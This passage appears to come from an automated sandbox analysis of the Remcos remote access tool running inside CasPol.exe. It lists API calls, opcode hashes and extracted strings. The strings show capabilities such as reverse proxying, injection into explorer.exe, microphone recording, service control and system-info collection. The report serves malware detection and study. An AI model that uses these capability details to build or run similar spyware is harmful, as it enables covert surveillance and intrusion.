                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 65535$udp
                                                                                                • API String ID: 0-1267037602
                                                                                                • Opcode ID: ca54308d78d3c4eee7f7b8de95e44a5f1974b5ba6ce0b2e83d9cd08af329ba0f
                                                                                                • Instruction ID: c3bfc2202edcb816331f8b78e042012e01f064b481147a6b300cfea58c86e196
                                                                                                • Opcode Fuzzy Hash: ca54308d78d3c4eee7f7b8de95e44a5f1974b5ba6ce0b2e83d9cd08af329ba0f
                                                                                                • Instruction Fuzzy Hash: E241F4716093029BD7209F28D905BBB3BA4EB84742F04042FF98593391EB6DDEC1866E
                                                                                                APIs
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004395C9
                                                                                                • GetLastError.KERNEL32(?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 004395D6
                                                                                                • __dosmaperr.LIBCMT ref: 004395DD
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439609
                                                                                                • GetLastError.KERNEL32(?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439613
                                                                                                • __dosmaperr.LIBCMT ref: 0043961A
                                                                                                • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401AD8,?), ref: 0043965D
                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,00401AD8,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 00439667
                                                                                                • __dosmaperr.LIBCMT ref: 0043966E
                                                                                                • _free.LIBCMT ref: 0043967A
                                                                                                • _free.LIBCMT ref: 00439681
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
                                                                                                • String ID:
                                                                                                • API String ID: 2441525078-0
                                                                                                • Opcode ID: 7d25b48f924a9fae5a5881453bd469cfe57fd0c2e6412707544dbbd620f0408d
                                                                                                • Instruction ID: 4e2bc3e06b1619faa1414a7a2c806c5d1514cda6e297fdc8b1054bbcfea92265
                                                                                                • Opcode Fuzzy Hash: 7d25b48f924a9fae5a5881453bd469cfe57fd0c2e6412707544dbbd620f0408d
                                                                                                • Instruction Fuzzy Hash: D431E27280560ABFDF11AFA5DC459AF3B68EF09324F10015EF81066251DB39CD50DBAA
                                                                                                APIs
                                                                                                • SetEvent.KERNEL32(?,?), ref: 00404E71
                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
                                                                                                • TranslateMessage.USER32(?), ref: 00404F30
                                                                                                • DispatchMessageA.USER32(?), ref: 00404F3B
                                                                                                • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00404FF3
                                                                                                • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B
                                                                                                  • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
                                                                                                • String ID: CloseChat$DisplayMessage$GetMessage
                                                                                                • API String ID: 2956720200-749203953
                                                                                                • Opcode ID: 9b8787533dcd79bb732ef5a109d6fd8af72174bfdde83fb33c2d9bb04fd93767
                                                                                                • Instruction ID: 290a0909c372499a911e5ffd519e5407deecd3e64339803c74491ead196e324c
                                                                                                • Opcode Fuzzy Hash: 9b8787533dcd79bb732ef5a109d6fd8af72174bfdde83fb33c2d9bb04fd93767
                                                                                                • Instruction Fuzzy Hash: A441B1726043016BC614FB75DC568AF7BA8ABC1714F00093EF906A31E6EF38DA05C79A
                                                                                                APIs
                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00466554), ref: 0041710A
                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00417113
                                                                                                • DeleteFileA.KERNEL32(00000000), ref: 00417122
                                                                                                • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 004170D6
                                                                                                  • Part of subcall function 00404468: send.WS2_32(00000270,00000000,00000000,00000000), ref: 004044FD
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
                                                                                                • String ID: <$@$HVG$HVG$Temp
                                                                                                • API String ID: 1107811701-2568817187
                                                                                                • Opcode ID: 1b96c791877afc48f80ffbcac7482fa3969ebd7c82bf800233f2d1ed8bde0b12
                                                                                                • Instruction ID: 91e4b2e714ed18abe86730f534b33d619c8c8851ecafca63038a632c75497fc1
                                                                                                • Opcode Fuzzy Hash: 1b96c791877afc48f80ffbcac7482fa3969ebd7c82bf800233f2d1ed8bde0b12
                                                                                                • Instruction Fuzzy Hash: 00319C31A00209ABCB04FBA1DC56AEE7775AF50308F40417EF506761E2EF785A89CB99
                                                                                                APIs
                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004197EE,00000000,00000000), ref: 00419E8A
                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004197EE,00000000,00000000), ref: 00419EA1
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197EE,00000000,00000000), ref: 00419EAE
                                                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004197EE,00000000,00000000), ref: 00419EBD
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197EE,00000000,00000000), ref: 00419ECE
                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004197EE,00000000,00000000), ref: 00419ED1
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                • String ID:
                                                                                                • API String ID: 221034970-0
                                                                                                • Opcode ID: fd4b3df9065e7dfd6d4a697e6f6a53e43d0cc3b02fd87625ee99f2ecddb25ff7
                                                                                                • Instruction ID: 401ec45fa9dd23e1a78cca63bf6ad54db5d4c9b9326c405a7ffc92fc58cb3c60
                                                                                                • Opcode Fuzzy Hash: fd4b3df9065e7dfd6d4a697e6f6a53e43d0cc3b02fd87625ee99f2ecddb25ff7
                                                                                                • Instruction Fuzzy Hash: 4211A331941218BBD711AB64DC85DFF3B6CDB45BA1B05002AF902A21D2DF64CD4A9AB5
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 100059EA
                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                • _free.LIBCMT ref: 100059F6
                                                                                                • _free.LIBCMT ref: 10005A01
                                                                                                • _free.LIBCMT ref: 10005A0C
                                                                                                • _free.LIBCMT ref: 10005A17
                                                                                                • _free.LIBCMT ref: 10005A22
                                                                                                • _free.LIBCMT ref: 10005A2D
                                                                                                • _free.LIBCMT ref: 10005A38
                                                                                                • _free.LIBCMT ref: 10005A43
                                                                                                • _free.LIBCMT ref: 10005A51
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                • Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
                                                                                                • Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
                                                                                                • Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84
                                                                                                APIs
                                                                                                • _free.LIBCMT ref: 00446FEF
                                                                                                  • Part of subcall function 00446CD5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A), ref: 00446CEB
                                                                                                  • Part of subcall function 00446CD5: GetLastError.KERNEL32(0000000A,?,0044FC60,0000000A,00000000,0000000A,00000000,?,0044FF04,0000000A,00000007,0000000A,?,00450415,0000000A,0000000A), ref: 00446CFD
                                                                                                • _free.LIBCMT ref: 00446FFB
                                                                                                • _free.LIBCMT ref: 00447006
                                                                                                • _free.LIBCMT ref: 00447011
                                                                                                • _free.LIBCMT ref: 0044701C
                                                                                                • _free.LIBCMT ref: 00447027
                                                                                                • _free.LIBCMT ref: 00447032
                                                                                                • _free.LIBCMT ref: 0044703D
                                                                                                • _free.LIBCMT ref: 00447048
                                                                                                • _free.LIBCMT ref: 00447056
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                • String ID:
                                                                                                • API String ID: 776569668-0
                                                                                                • Opcode ID: 6cab9f7d569f345c7814ae43f5c160195df6b64f63ea78a6b18b8aa73aee7787
                                                                                                • Instruction ID: 9fec27c2adf71536e74eabd4120179072dbaa777ef3671cded9c13d0800a1e4b
                                                                                                • Opcode Fuzzy Hash: 6cab9f7d569f345c7814ae43f5c160195df6b64f63ea78a6b18b8aa73aee7787
                                                                                                • Instruction Fuzzy Hash: 86119B7550011CBFDB05EF55C882CDD3BB5EF05364B9240AAF9494F222DA35DE50EB49
                                                                                                APIs
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Eventinet_ntoa
                                                                                                • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
                                                                                                • API String ID: 3578746661-3604713145
                                                                                                • Opcode ID: c42a50336210da67baa15dbbae404815dba44d2bd7f99351245f2adabd8b122b
                                                                                                • Instruction ID: 73c74054356758d85ec5353b0407031f458931cc5dd6312d5a4dd957febfbb04
                                                                                                • Opcode Fuzzy Hash: c42a50336210da67baa15dbbae404815dba44d2bd7f99351245f2adabd8b122b
                                                                                                • Instruction Fuzzy Hash: 5851A4316043005BCA14FB75D95AAAE36A59B84318F00453FF809972E1DFBC9D85C78E
                                                                                                APIs
                                                                                                • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00455FBF), ref: 0045536C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: DecodePointer
                                                                                                • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                • API String ID: 3527080286-3064271455
                                                                                                • Opcode ID: fcb8f87b81c24025c8faa1ed3748b23e21aaaa522dc2b9ab90eaf932e2f1aeea
                                                                                                • Instruction ID: 83316d2fa1d48b2f4155984bd6892a75fd3c5afb36d5e99e95f82d48d48c5a2a
                                                                                                • Opcode Fuzzy Hash: fcb8f87b81c24025c8faa1ed3748b23e21aaaa522dc2b9ab90eaf932e2f1aeea
                                                                                                • Instruction Fuzzy Hash: 93516C70900A09DBCF10DF58D5581BDBBB0FB0A306F204197DC81A7326DB798A6C8B1E
                                                                                                APIs
                                                                                                • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00416842
                                                                                                  • Part of subcall function 0041B825: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B83E
                                                                                                • Sleep.KERNEL32(00000064), ref: 0041686E
                                                                                                • DeleteFileW.KERNEL32(00000000), ref: 004168A2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                • API String ID: 1462127192-2001430897
                                                                                                • Opcode ID: 25fbc4e53667c5dd43b724cb52d87d0072074f9297d761f68d6d0eb068f3b122
                                                                                                • Instruction ID: c4be9e9118a59201799f54b99a9a171b680bb642a7e99c3b30ff6139130205e5
                                                                                                • Opcode Fuzzy Hash: 25fbc4e53667c5dd43b724cb52d87d0072074f9297d761f68d6d0eb068f3b122
                                                                                                • Instruction Fuzzy Hash: 1B313E719001189ADB04FBA1DC96EEE7764AF50708F00417FF946730D2EF786A8ACA9D
                                                                                                APIs
                                                                                                • GetCurrentProcess.KERNEL32(00475A50,00000000,004752F0,00003000,00000004,00000000,00000001), ref: 00406647
                                                                                                • GetCurrentProcess.KERNEL32(00475A50,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 00406705
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: CurrentProcess
                                                                                                • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                                                • API String ID: 2050909247-4242073005
                                                                                                • Opcode ID: 3d4dde61fac8f932cecf13147f1715ad91c8a5d9075df555c2e0fc840e87cdfb
                                                                                                • Instruction ID: 2a8ac338152687dbadce55b3d6de3572d7837fd421bef744f3a625c24d449dc1
                                                                                                • Opcode Fuzzy Hash: 3d4dde61fac8f932cecf13147f1715ad91c8a5d9075df555c2e0fc840e87cdfb
                                                                                                • Instruction Fuzzy Hash: B231B671600700AFD300AF65DC8AF5677A8FB44709F11053EF50ABB6E1EBB9A8548B6D
                                                                                                APIs
                                                                                                • _strftime.LIBCMT ref: 00401AD3
                                                                                                  • Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54
                                                                                                • waveInUnprepareHeader.WINMM(00472AC0,00000020,00000000,?), ref: 00401B85
                                                                                                • waveInPrepareHeader.WINMM(00472AC0,00000020), ref: 00401BC3
                                                                                                • waveInAddBuffer.WINMM(00472AC0,00000020), ref: 00401BD2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                                                                                • API String ID: 3809562944-243156785
                                                                                                • Opcode ID: f967693845db2f099b326b4d7d864d586aebfc9be2387861ffe01c8c5bee61a7
                                                                                                • Instruction ID: b0e15ff03f11dcb3e5bfd7c1448581b7ace3962aa9bffbd159c0990beee9d81b
                                                                                                • Opcode Fuzzy Hash: f967693845db2f099b326b4d7d864d586aebfc9be2387861ffe01c8c5bee61a7
                                                                                                • Instruction Fuzzy Hash: 7E315E315043019FC324EB21DC56A9E77A4FB94314F00493EF559A21F1EFB8AA89CB9A
                                                                                                APIs
                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041CB93
                                                                                                  • Part of subcall function 0041CC2A: RegisterClassExA.USER32(00000030), ref: 0041CC77
                                                                                                  • Part of subcall function 0041CC2A: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CC92
                                                                                                  • Part of subcall function 0041CC2A: GetLastError.KERNEL32 ref: 0041CC9C
                                                                                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041CBCA
                                                                                                • lstrcpynA.KERNEL32(00474B68,Remcos,00000080), ref: 0041CBE4
                                                                                                • Shell_NotifyIconA.SHELL32(00000000,00474B50), ref: 0041CBFA
                                                                                                • TranslateMessage.USER32(?), ref: 0041CC06
                                                                                                • DispatchMessageA.USER32(?), ref: 0041CC10
                                                                                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CC1D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                • String ID: Remcos
                                                                                                • API String ID: 1970332568-165870891
                                                                                                • Opcode ID: 7a949f86bc247f3cbdd076edfe2cda77560b6c3ffe772df9fdb29a851d56ec4a
                                                                                                • Instruction ID: 6591afd7fea275f101bd811abb8745f55115b26a2df550b070e187602390ba30
                                                                                                • Opcode Fuzzy Hash: 7a949f86bc247f3cbdd076edfe2cda77560b6c3ffe772df9fdb29a851d56ec4a
                                                                                                • Instruction Fuzzy Hash: 130112B1940344ABD7109BA5EC4DFEABBBCA7C5B05F004029E615A2061EFB8E585CB6D
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b79e0bacf68e79f56bbfbff6a95aeb92d11d955db7cfd18af0a5c0e52fbe5259
                                                                                                • Instruction ID: 8081305e108bfff8a8e14cd18a234b42858a69a1a1930647e7f2335dd99175ec
                                                                                                • Opcode Fuzzy Hash: b79e0bacf68e79f56bbfbff6a95aeb92d11d955db7cfd18af0a5c0e52fbe5259
                                                                                                • Instruction Fuzzy Hash: 44C105B0D04249AFEF11DFA9C8417BEBBB4EF09314F04415AE544A7392C738D941CBA9
                                                                                                APIs
                                                                                                • GetCPInfo.KERNEL32(?,?), ref: 00452DE6
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452E69
                                                                                                • __alloca_probe_16.LIBCMT ref: 00452EA1
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452EFC
                                                                                                • __alloca_probe_16.LIBCMT ref: 00452F4B
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 00452F13
                                                                                                  • Part of subcall function 00446D0F: RtlAllocateHeap.NTDLL(00000000,00434613,?,?,00437437,?,?,?,?,?,0040CD5A,00434613,?,?,?,?), ref: 00446D41
                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00452F8F
                                                                                                • __freea.LIBCMT ref: 00452FBA
                                                                                                • __freea.LIBCMT ref: 00452FC6
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                • String ID:
                                                                                                • API String ID: 201697637-0
                                                                                                • Opcode ID: 99a25f464b3411611be4dace684781a079b3d65d55a79cdd1f9a0b5e59597bb6
                                                                                                • Instruction ID: e285173fe66e9ab68cc8b5f7bb46492c032c90826bba7407019ac45f59d87ef3
                                                                                                • Opcode Fuzzy Hash: 99a25f464b3411611be4dace684781a079b3d65d55a79cdd1f9a0b5e59597bb6
                                                                                                • Instruction Fuzzy Hash: E991D572E002169BDF208E64DA41AEFBBB5AF0A312F14055BFC05E7242D778DC48C768
                                                                                                APIs
                                                                                                • CopyFileW.KERNEL32(?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D1B
                                                                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,?,00000000), ref: 10001D37
                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                                • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D72
                                                                                                • CloseHandle.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D7D
                                                                                                • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4108479926.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4108117762.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4108479926.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_10000000_CasPol.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                • String ID:
                                                                                                • API String ID: 1454806937-0
                                                                                                • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                                • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                                                APIs
                                                                                                  • Part of subcall function 004470CF: GetLastError.KERNEL32(?,?,0043952C,?,00000000,?,0043BB65,00000000,00000000), ref: 004470D3
                                                                                                  • Part of subcall function 004470CF: _free.LIBCMT ref: 00447106
                                                                                                  • Part of subcall function 004470CF: SetLastError.KERNEL32(00000000,00000000,00000000), ref: 00447147
                                                                                                  • Part of subcall function 004470CF: _abort.LIBCMT ref: 0044714D
                                                                                                • _memcmp.LIBVCRUNTIME ref: 004448B3
                                                                                                • _free.LIBCMT ref: 00444924
                                                                                                • _free.LIBCMT ref: 0044493D
                                                                                                • _free.LIBCMT ref: 0044496F
                                                                                                • _free.LIBCMT ref: 00444978
                                                                                                • _free.LIBCMT ref: 00444984
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.4098661182.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 0000000C.00000002.4098661182.0000000000477000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                • String ID: C
                                                                                                • API String ID: 1679612858-1037565863
                                                                                                • Opcode ID: 22687f451b19c2addafc151cb5d5621a4e148b1d4565a19059d61775dc5e4a25
